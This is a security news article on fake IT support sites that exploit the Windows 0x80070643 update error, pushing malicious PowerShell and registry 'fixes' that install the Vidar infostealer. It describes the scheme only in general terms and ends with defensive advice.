Fake IT support websites are exploiting common Windows errors, like the 0x80070643 error, by promoting malicious PowerShell "fixes" designed to infect devices with information-stealing malware. This threat was first identified by eSentire's Threat Response Unit (TRU).
The Scheme
Cyber criminals have been creating fake support sites, which are then promoted via compromised YouTube channels to lend credibility to the fraudulent content. These actors focus heavily on the 0x80070643 error, a problem affecting many Windows users since January 2024, following a Microsoft Patch Tuesday update aimed at fixing a BitLocker encryption bypass flaw (CVE-2024-20666).
After installing this update, users worldwide encountered the '0x80070643 - ERROR_INSTALL_FAILURE' message, which persists despite repeated attempts to resolve it. The actual issue is an incorrect error message caused by insufficient disk space in the Windows Recovery Environment (WinRE) partition, which must be manually expanded to accommodate the update—a complex task for most users.
Exploiting User Frustration
Frustrated users seeking solutions online have become prime targets for these cyber threats. eSentire's TRU discovered that threat actors were creating numerous fake IT support sites, specifically designed to address common Windows errors like 0x80070643. These sites offer supposed fixes that typically involve running a PowerShell script or importing a Windows Registry file, both of which ultimately download and execute malware.
Detailed Attack Process
eSentire's report details how these fake support sites operate. For example, the PCHelperWizard sites instruct users to copy a PowerShell script into the Windows Clipboard and run it. This script contains a Base64 encoded payload that connects to a remote server to download and install Vidar, an information-stealing malware. The process concludes with a fake success message, prompting users to restart their computer, which then activates the malware.
Similarly, the FixedGuides site uses an obfuscated Windows Registry file to hide autorun entries that launch a malicious PowerShell script. This script downloads and installs malware, which subsequently extracts sensitive information such as saved credentials, credit card details, browser cookies, and browsing history.
Consequences and Recommendations
Once the malware is active, it compiles stolen data into an archive (a "log") and uploads it to the attackers' servers. This data can be used for further attacks or sold on dark web marketplaces, leaving victims with compromised accounts and financial fraud risks.
To avoid such threats, it is crucial to download software and fixes only from trusted websites, avoiding random videos and websites with dubious reputations. Users are advised to remain vigilant against unconventional attack methods and protect their credentials, which have become highly valuable commodities for cyber criminals.
For those experiencing the 0x80070643 error, it is recommended to use Microsoft's Show or Hide Tool to hide the problematic update (KB5034441), rather than seeking unverified fixes online.
By following these guidelines, users can protect themselves from falling victim to these sophisticated cyber-attacks.
